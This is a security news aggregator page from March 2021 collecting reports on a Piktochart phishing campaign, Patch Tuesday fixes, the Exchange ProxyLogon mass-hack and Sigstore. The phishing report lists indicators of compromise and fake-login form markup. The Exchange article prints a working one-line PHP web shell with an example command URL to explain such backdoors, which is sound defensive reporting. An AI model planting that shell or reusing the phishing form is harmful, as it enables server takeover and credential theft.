Malware Devil

Thursday, March 11, 2021

The Future of Cyberwarfare

Over the years, we have seen an escalation in the series of hacks on health care services, power grids, nuclear plants and our privacy, with no respite. The threat is not just from China alone. It could be from North Korea or, as a matter of fact, from any state or non-state actor. This intent..

The post The Future of Cyberwarfare appeared first on Security Boulevard.

The post The Future of Cyberwarfare appeared first on Malware Devil.

https://malwaredevil.com/2021/03/11/the-future-of-cyberwarfare/?utm_source=rss&utm_medium=rss&utm_campaign=the-future-of-cyberwarfare

India and China’s Conflict Goes Cyber

In early March, Recorded Future’s Insikt Group published a report titled China-Linked Group RedEcho Targets the Indian Power Sector, which detailed China’s targeting of ten different Indian organizations within the energy sector, specifically the power generation and transmission sector and two from the maritime sector. In the Insikt Group assessment, there are “significant concerns over..

The post India and China’s Conflict Goes Cyber appeared first on Security Boulevard.

The post India and China’s Conflict Goes Cyber appeared first on Malware Devil.

https://malwaredevil.com/2021/03/11/india-and-chinas-conflict-goes-cyber/?utm_source=rss&utm_medium=rss&utm_campaign=india-and-chinas-conflict-goes-cyber

Piktochart – Phishing with Infographics, (Thu, Mar 11th)

[This is a guest diary submitted by JB Bowers]

In line with our recent diaries featuring unique attack vectors for credential theft, such as phishing over LinkedIn Mail[1] and pretending to be an Outlook version update[2], we’ve recently learned of a phishing campaign targetting users of the Infographic service Piktochart.

During the COVID-19 pandemic, nearly every kind of company has moved to use more online collaboration tools. This means that many small businesses, universities, primary and secondary schools, and others that may not be well-trained in online safety will be especially vulnerable to this type of attack, especially if they are using a relatively new tool, like Piktochart.

I had not used Piktochart before, but this week, security researcher @pageinsec[3] shared with me an infographic that asks the user to click on a link, in order to read a shared pdf document [4].

Piktochart has about 2,000 registered users, and about 24 million Piktocharts Created and is used by companies such as Forbes, TechCrunch, and others, according to their website. With a legitimate business purpose that is endorsed by some large companies, it is likely this is an effective way for the attackers to evade DNS filtering or other simple defenses against credential-stealing attacks.

Piktochart has a feature that makes it even better for phishing: Their registered “Pro users” can download an actual .pdf file, with the malicious link intact, or as well render the file into several different sizes of .png images, as indicated in the IOCs near the bottom of this page, which might be useful to hunt for similar activity.

An unsuspecting victim would receive an e-mail or social media post including the malicious Piktochart, from someone they knew, whose account had already been compromised. If they click the link, a 2nd stage credential stealer follows, which is a pretty decent-looking (but fake) Microsoft login page hosted at the domain obggladdenlightfoundation(.)org. This base domain currently has “0 out of 87” vendors reporting it as malicious on Virus Total, and is made out to be a non-profit in Lagos, Nigeria. This specific example had a different site registration than most of the other, identical sites I’ve researched, so it is possible this site was the result of a takeover of a legitimate business’ WordPress website, or a redirection of the site’s DNS.

Despite the technical simplicity, this is a dangerous campaign since it is after Microsoft 0365 credentials, and evidence points to the same IP being used for a large variety of credential theft sites. There are quite a few domains on the same IP[5], for example:

pwan-heritage(.)com/pol/OfficeV4/*
secure-official-spotify.pwanplus(.)com
www.dhl-delivery-failure-resolve.naijamail.com – This one includes a nice-looking DHL form [6]

Indicators of compromise – IOCs

URLS/Domains
create.piktochart.com/output/52653368-my-visual
piktochart.com (if not needed for businses)

2nd stage/stealer
obggladdenlightfoundation.org/dfsmith/ofc3
obggladdenlightfoundation.org/dfsmith/ofc3/
obggladdenlightfoundation.org/dfsmith/ofc3/r.php?signin=d41d8cd98f00b204e9800998ecf8427e&auth=39bea2eedcf78c893b4d0898d91bba501390ced533b8de1d796bcc5973da76e5b1cf6668
obggladdenlightfoundation.org/dfsmith/ofc3/s/?signin=d41d8cd98f00b204e9800998ecf8427e&auth=39bea2eedcf78c893b4d0898d91bba501390ced533b8de1d796bcc5973da76e5b1cf666

IP
%%ip:173.231.197.145%% [7]
Hostname: ded5495.inmotionhosting.com

Domain registrar: 007NAMES INC.
*Used in most of the domains

Microssoft cred stealer image – hashes(sha2)
7, 10, and 3kb versions of the same image
a90370dc587b73cd2dbe33504794e83c83dc9f365cd9cd94511593046db5ae09
bc2afe6e49541902541497a6823e1aa0f8e8683e203d4da6bc75590bddebeb702bed6013d59910f6714448cafeda98708886d48978b6b991627526964379efc0

DOM (cred-stealer page)
“
<form id=”1MDAwMDMxMjAyMS0wMy0wMjE2MTQ2NTgwMDQ4NTgxMTAx”> <input type=”hidden” value=”[removed]”><input type=”hidden” value=”[removed”> </form>
“

Post request
“form id=”f2″ method=”post” action=”#” style=”margin-bottom: 0px;”> <input required=”” type=”email” placeholder=”Email, phone, or Skype” name=”e”
style=”outline:none; background-color:transparent;border:0px solid;height:30px;width:300px;font-weight:lighter;font-size:15px;margin-left:5px;padding-bottom:0px;padding-top:0px;”> <img
src=”data:image/png;base64″…

Cookies
obggladdenlightfoundation.org/   1969-12-31
23:59:59   Name: PHPSESSID
obggladdenlightfoundation.org/dfsmith/ofc3/s   1969-12-31
23:59:59   Name: ip11

JB Bowers
@cherokeejb_

References:
[1] – https://isc.sans.edu/forums/diary/The+new+LinkedInSecureMessage/27110
[2] – https://isc.sans.edu/forums/diary/Pretending+to+be+an+Outlook+Version+Update/27144/
[3] – https://apageinsec.wordpress.com/
[4] – https://create.piktochart.com/output/52653368-my-visual
[5] – https://urlscan.io/result/e02ea839-9671-4d31-a039-effd54877c0b/related/
[6] – https://urlscan.io/screenshots/205111b7-b981-48e9-9359-df55f278163b.png
[7] – https://isc.sans.edu/ipinfo.html?ip=173.231.197.145

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post Piktochart – Phishing with Infographics, (Thu, Mar 11th) appeared first on Malware Devil.

https://malwaredevil.com/2021/03/11/piktochart-phishing-with-infographics-thu-mar-11th/?utm_source=rss&utm_medium=rss&utm_campaign=piktochart-phishing-with-infographics-thu-mar-11th

ISC Stormcast For Thursday, March 11th, 2021 https://isc.sans.edu/podcastdetail.html?id=7408, (Thu, Mar 11th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post ISC Stormcast For Thursday, March 11th, 2021 https://isc.sans.edu/podcastdetail.html?id=7408, (Thu, Mar 11th) appeared first on Malware Devil.

https://malwaredevil.com/2021/03/11/isc-stormcast-for-thursday-march-11th-2021-https-isc-sans-edu-podcastdetail-htmlid7408-thu-mar-11th/?utm_source=rss&utm_medium=rss&utm_campaign=isc-stormcast-for-thursday-march-11th-2021-https-isc-sans-edu-podcastdetail-htmlid7408-thu-mar-11th

iPhone app exposed other people’s call recordings

Video and audio are huge privacy concerns for people. If something goes wrong with tech it can have major ramifications. You’re likely very familiar with warnings about video. However, audio hasn’t always been so prominent. It’s only really since the rise of home assistants like Amazon’s Alexa that audio worries have gone mainstream.

Turning up the volume on audio threats

Bluetooth earphones and similar devices have only helped to raise awareness of potential issues, as we consider the tools we use the most. As per the link, it’s generally a lot harder to secure sound than vision. There isn’t an audio equivalent of the bit of tape over your webcam. You’re dealing with the innards of your device and that’s not for everyone. Either the hardware tinkering is beyond them, or their audio setup is a confusing mess of six audio devices and brand-specific audio controls.

It isn’t easy, and that’s just for desktop. Mobile is another proposition altogether, being an incredibly personal device yet something of a mystery-box to many owners. How does your Android phone work? Which version of Android is it even? How do the basic settings differ on your phone from mine? You’re giving me an iPhone for work? Sorry, I’ve never used one of those before.

These are just a sample selection of the things you’ll run into if you’ve ever been nominated your household’s Christmas season tech support. Worse, a lot of what seems to happen on a phone actually happens in the cloud (such as interpreting voice commands), where it’s completely beyond your reach.

Which brings us neatly to a recent discovery.

Listening in to someone else’s recordings

Researchers found an issue with an iPhone call recording app, which boasts of “more than 1,000,000 downloads”. Used to record and share clips via email, or saved to storage solutions such as Dropbox and Google Drive, it offers a fair bit of flexibility for people in need of some audio recording.

The researcher who discovered the vulnerability used various security testing tools to view and modify network traffic used by the app. From there, they discovered it was possible to replace their own phone number with someone else’s. With that done, recordings from that phone (located in the cloud, on an Amazon AWS bucket) were available to them, without a password. The entire call history and the numbers calls were made on were also available, at least until the app was updated and the problem fixed by the developers.

Or, as the researchers at PingSafe put it:

The vulnerability allowed any malicious actor to listen to any user’s call recording from the cloud storage bucket of the application and an unauthenticated API endpoint which leaked the cloud storage URL of the victim’s data

Considering the kind of recordings people could make, this is a worrying thing to have happened. Think of all the business sensitive conversations people might have, or personal discussions, random thoughts, or anything else. Yes, we can argue people shouldn’t upload mission critical work conversations into the cloud (or even a laundry list of complaints about their neighbour). However, if you give people a recording app then record they will.

The perils of audio data in the cloud

TechCrunch reports there were 130,000+ audio recordings, weighing in at some 300GB in size, in the storage bucket. That’s a lot of potential for mischief, pranks, trolling, or just plain old blackmail and extortion. If we’re lucky, the only person who noticed this was the researcher who reported it.

Audio has always been a source for security and privacy concerns. Whether we’re talking fake Twitch audio fixes or where people’s data ends up, it’s always worth keeping in mind.

It might not be as visible a concern as the usual security hot-spots on your laptops and mobile devices, or as obvious as video. All the same, it’s an important part of your overall security hygiene.

This is probably an excellent moment to check:

if your audio software need updating
your streaming accounts are secure
you’re happy with any audio files kept in the cloud

Follow these steps and hopefully your audio security will soon catch up with your visual-based best practices.

The post iPhone app exposed other people’s call recordings appeared first on Malwarebytes Labs.

The post iPhone app exposed other people’s call recordings appeared first on Malware Devil.

https://malwaredevil.com/2021/03/10/iphone-app-exposed-other-peoples-call-recordings/?utm_source=rss&utm_medium=rss&utm_campaign=iphone-app-exposed-other-peoples-call-recordings

If you have an F5, it’s time to patch! Thanks Michele for the link to today’s crop of F5 CVE’s, which include an unauthenticated RCE against the API, and another RCE against “hidden” config pages! https://support.f5.com/csp/article/K02566623, (Wed, Mar 10th)

=============== Rob VandenBrink coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post If you have an F5, it’s time to patch! Thanks Michele for the link to today’s crop of F5 CVE’s, which include an unauthenticated RCE against the API, and another RCE against “hidden” config pages! https://support.f5.com/csp/article/K02566623, (Wed, Mar 10th) appeared first on Malware Devil.

https://malwaredevil.com/2021/03/10/if-you-have-an-f5-its-time-to-patch-thanks-michele-for-the-link-to-todays-crop-of-f5-cves-which-include-an-unauthenticated-rce-against-the-api-and-another-rce-against-hidden-config/?utm_source=rss&utm_medium=rss&utm_campaign=if-you-have-an-f5-its-time-to-patch-thanks-michele-for-the-link-to-todays-crop-of-f5-cves-which-include-an-unauthenticated-rce-against-the-api-and-another-rce-against-hidden-config

Tuesday, March 9, 2021

Microsoft, DoD, Alexa, Intel, Aaran Leyland, & Side Channel Attacks – SWN #105

This week Dr. Doug talks More Microsoft attacks and more info on the Exchange server attacks, a new Intel Side Channel attack, Your python may be poisoned, the DoD let down its guard on contractors, & Aaran Leyland returns for guest Expert Commentary!

Time Stamps:

1:36- Fake Google reCaptcha attack phishes for Office365 Users
3:12 – HAFNIUM attack explained with source code examples.
4:30 – New Side Channel Attack targets Intel with Ring Interconnect latency attack https://www.instapaper.com/read/1393789534 — source code
7:19 – GAO reports that DoD contractors are not subject to Cybersecurity Requirements
8:45 – Poisoned Python Packages Proliferate
11: – Aaran Leyland
28:34 – Can Alexa listen to your heartbeat out there in the dark?

Visit https://www.securityweekly.com/swn for all the latest episodes!

Show Notes: https://securityweekly.com/swn105

The post Microsoft, DoD, Alexa, Intel, Aaran Leyland, & Side Channel Attacks – SWN #105 appeared first on Malware Devil.

https://malwaredevil.com/2021/03/09/microsoft-dod-alexa-intel-aaran-leyland-side-channel-attacks-swn-105/?utm_source=rss&utm_medium=rss&utm_campaign=microsoft-dod-alexa-intel-aaran-leyland-side-channel-attacks-swn-105

Microsoft Patch Tuesday Updates Fix 14 Critical Bugs

Microsoft’s regularly scheduled March Patch Tuesday updates address 89 CVEs overall.
Read More

The post Microsoft Patch Tuesday Updates Fix 14 Critical Bugs appeared first on Malware Devil.

https://malwaredevil.com/2021/03/09/microsoft-patch-tuesday-updates-fix-14-critical-bugs/?utm_source=rss&utm_medium=rss&utm_campaign=microsoft-patch-tuesday-updates-fix-14-critical-bugs

Microsoft Patch Tuesday Fixes 82 CVEs, Internet Explorer Zero-Day

The monthly rollout follows last week’s emergency Microsoft Exchange Server patch covering seven CVEs, four of which are under attack.

Microsoft today released 82 security fixes as part of its monthly Patch Tuesday rollout, which this month addresses 10 critical vulnerabilities and one Internet Explorer zero-day. This brings its March patch count to 89 after the release of emergency patches for seven CVEs last week.

The out-of-band Exchange patch released March 2 covers seven unique CVEs, four of which are under active attack. Organizations running on-premises Exchange Servers are advised to address the vulnerabilities as soon as possible, as attackers are continuing to scan for and exploit them.

Microsoft today pushed additional patches for older, unsupported versions of Exchange Server.

Today’s Patch Tuesday release addresses vulnerabilities in Microsoft Windows, Azure and Azure DevOps, Azure Sphere, Internet Explorer, the Edge browser, Office and Office Services and Web Apps, SharePoint Server, Visual Studio, and Windows Hyper-V. One is both publicly known and under active attack.

That is CVE-2021-26411, a memory corruption vulnerability in Internet Explorer that could let a successful attacker run code on a target system if a victim views a specially designed HTML file. This affects older versions such as Internet Explorer 11, and newer EdgeHTML-based versions.

“This kind of exploit would give the attacker the same operating system permissions as the user visiting the website,” says Kevin Breen, director of cyber-threat research at Immersive Labs. “So, if you’re browsing the Internet as a standard user, the attacker will get user level access to your file system and limited access to the operating system.”

It’s a reminder that employees should never browse the Web while logged in with admin privileges, he adds. If a victim is browsing the Internet as an admin, attackers could get “full unrestricted access” to the file system and operating system, Breen adds. Microsoft notes the attack to exploit this critical flaw is low in complexity and requires no privileges.

Worth noting is CVE-2021-26897, a critical remote code execution (RCE) vulnerability in Windows DNS Server. It’s worth noting Microsoft patched five RCE flaws in DNS server this month; this is the only one rated Critical. This flaw is also rated as “exploitation more likely” by Microsoft, and requires no privileges and low attack complexity.

“These attacks are not limited to external attackers — they also become a target for attackers who may already be inside your network,” Breen says. “An attacker gaining access to manipulate a DNS server within your organization can have a significant impact on your overall security.”

Another CVE that draws attention to privileges is CVE-2021-27076, an RCE vulnerability in SharePoint Server. This is also categorized as “exploitation more likely” and indicates an attacker could exploit the server to gain code execution over the network. A successful attacker would need privileges to create or modify Sites in SharePoint, which authenticated users can do by default. It’s a reminder that users who don’t need specific privileges shouldn’t have them.

Today’s Critical patches also address two RCE flaws in Azure Sphere, both of which are unsigned code execution vulnerabilities. However, users likely won’t need to take action because devices running Azure Sphere connected to the Internet get automatic updates, as Dustin Childs, with Trend Micro’s Zero-Day Initiative, points out. These flaws are listed as CVE-2021-27074 and CVE-2021-27080.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial … View Full Bio

Recommended Reading:

Comment |

Email This |

Print |

RSS

More Insights

Webcasts
More Webcasts

White Papers

7 Experts on Implementing Microsoft Defender for Endpoint

A Guide to Build vs Buy Service Models for Threat Detection and Response

More White Papers

Reports

2021 Top Enterprise IT Trends – Network Computing

Are Unprotected Cloud Databases Leaking Your Data?

More Reports

The post Microsoft Patch Tuesday Fixes 82 CVEs, Internet Explorer Zero-Day appeared first on Malware Devil.

https://malwaredevil.com/2021/03/09/microsoft-patch-tuesday-fixes-82-cves-internet-explorer-zero-day/?utm_source=rss&utm_medium=rss&utm_campaign=microsoft-patch-tuesday-fixes-82-cves-internet-explorer-zero-day

Dark Web Markets for Stolen Data See Banner Sales

Despite an explosion in the sheer amount of stolen data available on the Dark Web, the value of personal information is holding steady, according to the 2021 Dark Web price index from Privacy Affairs. That leaves these thriving dirty data dealers in a familiar predicament — they need to lock down their growing businesses for […]
Read More

The post Dark Web Markets for Stolen Data See Banner Sales appeared first on Malware Devil.

https://malwaredevil.com/2021/03/09/dark-web-markets-for-stolen-data-see-banner-sales/?utm_source=rss&utm_medium=rss&utm_campaign=dark-web-markets-for-stolen-data-see-banner-sales

MetalBallStudios: Size Of The Internet – Bytes In Perspective

Permalink

The post MetalBallStudios: Size Of The Internet – Bytes In Perspective appeared first on Security Boulevard.

The post MetalBallStudios: Size Of The Internet – Bytes In Perspective appeared first on Malware Devil.

https://malwaredevil.com/2021/03/09/metalballstudios-size-of-the-internet-bytes-in-perspective/?utm_source=rss&utm_medium=rss&utm_campaign=metalballstudios-size-of-the-internet-bytes-in-perspective

Warning the World of a Ticking Time Bomb

Globally, hundreds of thousand of organizations running Exchange email servers from Microsoft just got mass-hacked, including at least 30,000 victims in the United States. Each hacked server has been retrofitted with a “web shell” backdoor that gives the bad guys total, remote control, the ability to read all email, and easy access to the victim’s other computers. Researchers are now racing to identify, alert and help victims, and hopefully prevent further mayhem.

On Mar. 5, KrebsOnSecurity broke the news that at least 30,000 organizations and hundreds of thousands globally had been hacked. The same sources who shared those figures say the victim list has grown considerably since then, with many victims compromised by multiple cybercrime groups.

Security experts are now trying to alert and assist these victims before malicious hackers launch what many refer to with a mix of dread and anticipation as “Stage 2,” when the bad guys revisit all these hacked servers and seed them with ransomware or else additional hacking tools for crawling even deeper into victim networks.

But that rescue effort has been stymied by the sheer volume of attacks on these Exchange vulnerabilities, and by the number of apparently distinct hacking groups that are vying for control over vulnerable systems.

A security expert who has briefed federal and military advisors on the threat says many victims appear to have more than one type of backdoor installed. Some victims had three of these web shells installed. One was pelted with eight distinct backdoors. This initially caused a major overcount of potential victims, and required a great deal of de-duping various victim lists.

The source, who spoke on condition of anonymity, said many in the cybersecurity community recently saw a large spike in attacks on thousands of Exchange servers that was later linked to a profit-motivated cybercriminal group.

“What we thought was Stage 2 actually was one criminal group hijacking like 10,000 exchange servers,” said one source who’s briefed U.S. national security advisors on the outbreak.

On Mar. 2, when Microsoft released updates to plug the four Exchange flaws being attacked, it attributed the hacking activity to a previously unidentified Chinese cyber espionage group it called “Hafnium.” Microsoft said Hafnium had been using the Exchange flaws to conduct a series of low-and-slow attacks against specific strategic targets, such as non-governmental organization (NGOs) and think tanks.

But by Feb. 26, that relatively stealthy activity was morphing into the indiscriminate mass-exploitation of all vulnerable Exchange servers. That means even Exchange users that patched the same day Microsoft released security updates may have had servers seeded with backdoors.

Many experts who spoke to KrebsOnSecurity said they believe different cybercriminal groups somehow learned of Microsoft’s plans to ship fixes for the Exchange flaws a week earlier than they’d hoped (Microsoft originally targeted today, Patch Tuesday, as the release date).

The vulnerability scanning activity also ramped up markedly after Microsoft released its updates on Mar. 2. Security researchers love to tear apart patches for clues about the underlying security holes, and one major concern is that various cybercriminal groups may have already worked out how to exploit the flaws independently.

AVERTING MASS-RANSOMWARE

Security experts now are desperately trying to reach tens of thousands of victim organizations with a single message: Whether you have patched yet or have been hacked, backup any data stored on those servers immediately.

Every source I’ve spoken with about this incident says they fully expect profit-motivated cybercriminals to pounce on victims by mass-deploying ransomware. Given that so many groups now have backdoor web shells installed, it would be trivial to unleash ransomware on the lot of them in one go. Also, compromised Exchange servers can be a virtual doorway into the rest of the victim’s network.

“With the number of different threat actors dropping [web] shells on servers increasing, ransomware is inevitable,” said Allison Nixon, chief research officer at Unit221B, a New York City-based cyber investigations firm.

So far there are no signs of victims of this mass-hack being ransomed. But that may well change if the exploit code used to break into these vulnerable Exchange servers goes public. And nobody I’ve interviewed seems to think working exploit code is going to stay unpublished for much longer.

When that happens, the exploits will get folded into publicly available exploit testing kits, effectively making it simple for any attacker to find and compromise a decent number of victims who haven’t already patched.

CHECK MY OWA

Nixon is part of a group of security industry leaders who are contributing data and time to a new victim notification platform online called Check My OWA (Outlook Web Access, the Internet-facing Web component of Exchange Server machines).

Checkmyown.unit221b.com checks if your Exchange Server domain showed up in attack logs or lists of known-compromised domains.

Perhaps it’s better to call it a self-notification service that is operated from Unit221B’s own web site. It draws on tens of thousands of data points that various ISPs and hosting firms have tied to victims around the world who are likely compromised by the backdoor shells. The data comes from large networks watching the sources and targets of mass-scans for vulnerable Exchange servers.

“Our goal is to motivate people who we might otherwise have never been able to contact,” Nixon said. “My hope is if this site can get out there, then there’s a chance some victim companies are notified and take action or can get attention.”

Enter an email address at Check My OWA, and if that address matches a domain name for a victim organization, that email address will get a notice.

If the email’s domain name (anything to the right of the @ sign) is detected in their database, the site will send that user an email stating that is has observed the email domain in a list of targeted domains.

“Malicious actors were able to successfully compromise, and some of this information suggested they may have been able to install a webshell on an Exchange server associated with this domain,” reads one of the messages to victims. “We strongly recommend saving an offline backup of your Exchange server’s emails immediately, and refer back to the site for additional information on patching and remediation.”

Other Exchange users may see this message:

“We have observed your e-mail domain appears in our list of domains the malicious actors were able to successfully compromise, and some of this information suggested they may have been able to install a webshell on an Exchange server associated with this domain,” is another message the site may return. We strongly recommend saving an offline backup of your Exchange server’s emails immediately, and refer back to the site for additional information on patching and remediation.”

Nixon said Exchange users can save themselves a potentially nightmarish scenario if they just back up any affected systems now. And given the number of adversaries currently attacking still-unpatched Exchange systems, there is almost no way this won’t end in disaster for at least some victims.

“There are researchers running honeypots to [attract] attacks from different groups, and those honeypots are getting shelled left and right,” she said. “The sooner they can run a backup, the better. This can help save a lot of heartache.”

Oh, and one more important thing: You’ll want to keep any backups disconnected from everything. Ransomware has a tendency to infect everything it can, so make sure at least one backup is stored completely offline.

“Just disconnect them from a computer, put them in a safe place and pray you don’t need them,” Nixon said.

The post Warning the World of a Ticking Time Bomb appeared first on Malware Devil.

https://malwaredevil.com/2021/03/09/warning-the-world-of-a-ticking-time-bomb/?utm_source=rss&utm_medium=rss&utm_campaign=warning-the-world-of-a-ticking-time-bomb

Phishing, Scam, & Marketing Emails: What’s the Difference?

When it comes to email communications today, phishing and spam are both unwelcome nuisances in everyone’s inbox. In order to defend against the different tactics cybercriminals are leveraging online, a variety of essential security measures are necessary–one of the most important being general awareness. Even though the words “phishing” and “spam” are often used […]

The post Phishing, Scam, & Marketing Emails: What’s the Difference? appeared first on Hurricane Labs.

The post Phishing, Scam, & Marketing Emails: What’s the Difference? appeared first on Security Boulevard.

The post Phishing, Scam, & Marketing Emails: What’s the Difference? appeared first on Malware Devil.

https://malwaredevil.com/2021/03/09/phishing-scam-marketing-emails-whats-the-difference/?utm_source=rss&utm_medium=rss&utm_campaign=phishing-scam-marketing-emails-whats-the-difference

Adobe Critical Code-Execution Flaws Plague Windows Users

The critical flaws exist in Adobe Framemaker, Connect and the Creative Cloud desktop application for Windows.
Read More

The post Adobe Critical Code-Execution Flaws Plague Windows Users appeared first on Malware Devil.

https://malwaredevil.com/2021/03/09/adobe-critical-code-execution-flaws-plague-windows-users/?utm_source=rss&utm_medium=rss&utm_campaign=adobe-critical-code-execution-flaws-plague-windows-users

Linux Foundation Debuts Sigstore Project for Software Signing

Sigstore aims to improve the open source software supply chain by simplifying the process of cryptographic software signing.

The Linux Foundation today announced its launch of Sigstore, a new nonprofit initiative that aims to improve open source software supply chain security by making it easier for developers to adopt cryptographic signing for different components of the software development process.

Sigstore will be free for software providers and developers, who can use it to securely sign software artifacts such as release files, container images, binaries, and bill-of-material manifests. Signing materials are then stored in a tamper-proof public log. The service’s code and operation tooling will be fully open source and maintained and developed by the Sigstore community.

Founding members include Red Hat, Google, and Purdue University. The idea for the service came from Luke Hinds, security engineering lead in Red Hat’s Office of the CTO. He pitched the concept to Google software engineer Dan Lorenc, and the two began to work on it. Now the Sigstore project has a “small but agile community” working on its development, Lorenc says.

Software supply chains face security risks. Users are exposed to targeted attacks, as well as account and cryptographic key compromise. Keys are difficult for software maintainers to manage. Software projects often have a list of keys in use, and maintainers must handle the keys of people no longer involved. These public keys are often stored on git repo readme files or websites, where they may be susceptible to tampering and don’t securely convey trust.

Software signing is meant to convey trust. The process of digitally signing software is meant to provide evidence that the code comes from a known developer or software vendor and hasn’t been tampered with. This gives users confidence they’re using code from a trusted source.

But few open source projects cryptographically sign software artifacts. “We spent almost the last nine months or so talking to different open source maintainers and communities on how they’re doing this, if they’re not doing this [then] why not, and then user perspective: Do you care if people are signing? How do you know what keys to check against?” Lorenc says.

Their team found “a huge amount lacking in the space,” he continues. Most software projects aren’t doing anything at all to improve secure software signing. The tool sets many have used in the past require signing one other’s keys in person, which doesn’t work for remote developers, Hinds adds. Sigstore aims to both ease the adoption, and lower the risk, of software signing.

“When you take on signing, you take on a lot of risk as well, because … you have to protect a private key and this really exposes the risk of a project,” Hinds continues. “It’s a kind of chicken and egg: The need to sign things to provide assurance to their users, but once they do start to sign things, they up the ante around their attack surface and a possible key compromise.”

How It Works
To make the process simple, Sigstore relies on the OpenID authentication protocol to connect certificates to identities. This allows developers to use security controls they already have, such as multifactor authentication, one-time passwords, and hardware token generators.

Existing signing solutions essentially work to build a whole new identity system, and give users private keys they’re responsible for protecting, Lorenc explains. Sigstore “piggybacks off of an existing identity system that everybody already knows how to work with, that’s already federated, and already gets all the attention of security professionals at organizations.”

Sigstore users use its tooling to create ephemeral short-lived key pairs. Its public key infrastructure (PKI) service provides a signing certificate following the successful OpenID connect grant. From there, certificates are recorded into a certificate transparency log, and software signing materials go to a signature transparency log, Sigstore explains on its website.

These transparency logs are a public and tamper-proof record of sign-in events, Hinds notes. “By having that available, anybody can audit or monitor these logs for who’s signing what. It makes it publicly transparent,” he adds. Anyone can perform queries using an artifacts digest or return entries that are signed by a specific public key or email address.

Because the keys are short-lived, there is no concern about keys potentially being left and vulnerable to compromise, Hinds says. After that, there’s nothing left for the developer to manage and all activity is recorded in the log.

Today marks the launch of the foundation, Hinds says. While the transparency log is fully functional, Sigstore isn’t available to developers just yet. As for what developers will be able to sign and store, the team is first aiming for generic release artifacts such as compiled binaries and container images. Later on, they plan to explore other formats and manifest signing.

The team hopes Sigstore will be made available later this year, though an official date has not yet been determined.

Recommended Reading:

Comment |

Email This |

Print |

RSS

More Insights

Webcasts

Nip Ransomware in the FUD: Detecting Attacks Pre-Encryption

More Webcasts

White Papers

7 Experts on Implementing Microsoft Defender for Endpoint

A Guide to Build vs Buy Service Models for Threat Detection and Response

More White Papers

Reports

2021 Top Enterprise IT Trends – Network Computing

The State of DevSecOps Report

More Reports

The post Linux Foundation Debuts Sigstore Project for Software Signing appeared first on Malware Devil.

https://malwaredevil.com/2021/03/09/linux-foundation-debuts-sigstore-project-for-software-signing/?utm_source=rss&utm_medium=rss&utm_campaign=linux-foundation-debuts-sigstore-project-for-software-signing

Microsoft Exchange attacks cause panic as criminals go shell collecting

Only last week we posted a blog about multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Seeing how this disclosure came with a patch being available, under normal circumstances you would see some companies update quickly and others would dally until it bubbled up to the top of their to-do list.

This attack method, called ProxyLogon and attributed to a group called Hafnium, was different. It went from “limited and targeted attacks” to a full-size panic in no time. Attackers are using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.

How did this situation evolve? A timeline

To demonstrate how this situation came about we want to show you this timeline of developments:

December 2020, CVE-2021-26855 is discovered by DEVCORE, who named the vulnerability ProxyLogon.
January 2021, DEVCORE send an advisory and exploit to Microsoft through the MSRC portal.
January 2021, Volexity and Dubex start to see exploitation of Exchange vulnerabilities.
January 27, 2021, Dubex shares its findings with Microsoft.
February 2, 2021, Volexity informs Microsoft of its findings.
March 2, 2021, Microsoft publishes a patch and advisory, which has been updated a few times since then.
March 4, 2021, The Cybersecurity and Infrastructure Security Agency issues an emergency directive after CISA partners observe active exploitation of vulnerabilities in Microsoft Exchange on-premises products.
March 5, 2021, Microsoft and many security vendors see increased use of these vulnerabilities in attacks targeting unpatched systems, by multiple malicious actors, not just Hafnium.
March 8, 2021, CISA issues a warning that it is aware of widespread domestic and international exploitation of these vulnerabilities.

The attacks went from a limited Advanced Persistent Threat (APT) used against targeted victims to crypto m ining operations run by “common” cybercriminals in no time flat.

What often happens after vulnerabilities get disclosed and patched is that criminals reverse engineer the fix to create their own copycat exploits, so they can attack while systems are unpatched. Sometimes it takes a lot of skills and perseverance to get a vulnerability to work for you, but looking at the rapid introduction of these Exchange exploits into the threat landscape, this one looks like a piece of cake.

Victims

As of 8 March, Malwarebytes had detected malicious web shells on close to 1,000 unique machines already. Although most of the recorded attacks have occurred in the United States, organizations in other countries are under attack as well.

web shells detected worldwide — *Instances found of Backdoor.Hafnium*

Chris Krebs, the former director of CISA, reckons government agencies and small businesses will be more affected by these attacks than large enterprises. Enterprises tend to use different software than on-premises Exchange Servers.

Distribution of Backdoor.Hafnium detections by country by 8 March, 2021

But Brian Krebs, in a post on his site, states that the Hafnium hackers have accelerated attacks on vulnerable Exchange servers since Microsoft released the patches. His sources told him that 30,000 organizations in the US have been hacked as part of this campaign.

Web shells

A web shell is as a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)

Web shells don’t attack or exploit a remote vulnerability, they are always the second step of an attack. Even if it opens the door to further exploitation, a web shell itself is always dropped after an initial exploitation.

Web shell scripts can be written in any of the programming languages designed for use on the web. You will find PHP, ASP, Perl, and many others. Attackers who successfully use web shells take advantage of the fact that many organizations do not have complete visibility into the HTTP sessions on their servers. And most web shells are basically non-executable files, which can make it hard for traditional antivirus software to detect them. The tiniest web shell in PHP on record is only this big:

<?=`$_GET[1]`?>

A shell like this will simply execute whatever command an attacker sends to the compromised server. They run it by calling the script in their browser, or from a command line HTTP client. For example, the following url would cause a tiny web shell running on example.com to execute whatever we put replaced {command} with:

www.example.com/index.html?1={command}

As you can see the use of this type of backdoor is easy. Once you have planted the web shell, you can use it to create additional web shells or steal information from the server.

What can we do?

Patch as soon as you can.

Microsoft’s team has published a script on GitHub that can check the security status of Exchange servers. The script has been updated to include indicators of compromise (IOCs) linked to the four zero-day vulnerabilities found in Microsoft Exchange Server.

It was important to patch last week, when it was just targeted attacks, but it’s all the more urgent now that it’s wild west out there. If you can’t patch your Exchange server, block internet access to it, or restrict access to it by blocking untrusted connections, or putting the server behind your VPN.

Scan your server for the presence of malicious web shells. Security vendors have added detection for the publicly posted IOCs and some will detect other malicious web shells as well.

